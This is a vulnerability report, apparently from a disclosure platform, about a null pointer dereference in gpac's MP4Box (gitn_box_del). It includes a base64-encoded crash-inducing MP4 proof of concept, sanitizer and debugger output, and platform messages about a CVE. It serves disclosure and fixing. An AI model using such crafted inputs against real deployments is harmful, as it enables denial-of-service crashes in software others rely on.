NULL Pointer Dereference in gpac/gpac
Valid
Reported on
Jan 31st 2022
Description
Null Pointer Dereference in gitn_box_del
Proof of Concept
echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d > poc
./MP4Box -bt ./poc
Sanitizer output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==6791==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f32f604f350 bp 0x606000000380 sp 0x7ffec6197280 T0)
==6791==The signal is caused by a READ memory access.
==6791==Hint: address points to the zero page.
#0 0x7f32f604f350 in gitn_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350)
#1 0x7f32f606c54d in gf_isom_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e954d)
#2 0x7f32f606c32e in gf_isom_box_parse_ex (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e932e)
#3 0x7f32f606baab in gf_isom_parse_root_box (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e8aab)
#4 0x7f32f60747bd in gf_isom_parse_movie_boxes (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f17bd)
#5 0x7f32f6075ca5 in gf_isom_open_file (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f2ca5)
#6 0x4de8fd in mp4boxMain (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x4de8fd)
#7 0x7f32f5afc0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x429b2d in _start (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x429b2d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350) in gitn_box_del
==6791==ABORTING
gdb output
gdb ./MP4Box -q
Reading symbols from ./MP4Box...
pwndbg> r -bt ./poc
Starting program: /home/presler/fuzzing/gpac_pure/bin/gcc/MP4Box -bt ./poc
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[iso file] Box "meta" (start 0) has 5 extra bytes
[iso file] Unknown top-level box type 0000
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────── RAX 0x0
RBX 0x0
RCX 0x10000100
RDX 0x3030
RDI 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RSI 0x7ffff7df51ba ◂— 'no-check'
R8 0x0
R9 0x0
R10 0x7ffff7748e42 ◂— 'gf_isom_box_del'
R11 0x7ffff7955d40 (gf_isom_box_del) ◂— endbr64
R12 0x0
R13 0x6769746e
R14 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
R15 0xffffffec
RBP 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RSP 0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RIP 0x7ffff7936e3f (gitn_box_del+47) ◂— mov rdi, qword ptr [r8 + rax + 8]
───────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────── ► 0x7ffff7936e3f <gitn_box_del+47> mov rdi, qword ptr [r8 + rax + 8]
0x7ffff7936e44 <gitn_box_del+52> test rdi, rdi
0x7ffff7936e47 <gitn_box_del+55> je gitn_box_del+112 <gitn_box_del+112>
↓
0x7ffff7936e80 <gitn_box_del+112> add rbx, 1
0x7ffff7936e84 <gitn_box_del+116> movzx eax, dx
0x7ffff7936e87 <gitn_box_del+119> cmp eax, ebx
0x7ffff7936e89 <gitn_box_del+121> ja gitn_box_del+40 <gitn_box_del+40>
↓
0x7ffff7936e38 <gitn_box_del+40> mov rax, rbx
0x7ffff7936e3b <gitn_box_del+43> shl rax, 4
0x7ffff7936e3f <gitn_box_del+47> mov rdi, qword ptr [r8 + rax + 8]
0x7ffff7936e44 <gitn_box_del+52> test rdi, rdi
───────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────00:0000│ rsp 0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
01:0008│ 0x7fffffff7d48 —▸ 0x7fffffff7ec0 ◂— 0x0
02:0010│ 0x7fffffff7d50 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
03:0018│ 0x7fffffff7d58 —▸ 0x7ffff7955d6c (gf_isom_box_del+44) ◂— test r12, r12
04:0020│ 0x7fffffff7d60 —▸ 0x7fffffff7ec0 ◂— 0x0
05:0028│ 0x7fffffff7d68 —▸ 0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
06:0030│ 0x7fffffff7d70 ◂— 0x11
07:0038│ 0x7fffffff7d78 —▸ 0x7ffff7956570 (gf_isom_box_parse_ex+1888) ◂— cmp qword ptr [rsp + 8], 0
─────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────── ► f 0 0x7ffff7936e3f gitn_box_del+47
f 1 0x7ffff7955d6c gf_isom_box_del+44
f 2 0x7ffff7956570 gf_isom_box_parse_ex+1888
f 3 0x7ffff7956a30 gf_isom_parse_root_box+64
f 4 0x7ffff795f17c gf_isom_parse_movie_boxes_internal+236
f 5 0x7ffff7960907 gf_isom_open_file+311
f 6 0x55555557f614 mp4boxMain+19444
f 7 0x7ffff75470b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> bt
#0 0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#1 0x00007ffff7955d6c in gf_isom_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10#2 0x00007ffff7956570 in gf_isom_box_parse_ex () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#3 0x00007ffff7956a30 in gf_isom_parse_root_box () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#4 0x00007ffff795f17c in gf_isom_parse_movie_boxes_internal () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#5 0x00007ffff7960907 in gf_isom_open_file () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#6 0x000055555557f614 in mp4boxMain ()
#7 0x00007ffff75470b3 in __libc_start_main (main=0x55555556d500 <main>, argc=3, argv=0x7fffffffdd08, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdcf8) at ../csu/libc-start.c:308
#8 0x000055555556d53e in _start ()
Impact
This vulnerability is capable of crashing software, so I think this can be described as DoS.
References
We are processing your report and will contact the
gpac
team within 24 hours.
a year ago
We have contacted a member of the
gpac
team and are waiting to hear back
a year ago
@mantainer - the researcher has requested a CVE for this report. Are you happy for us to go ahead and assign a CVE to this report?
to join this conversation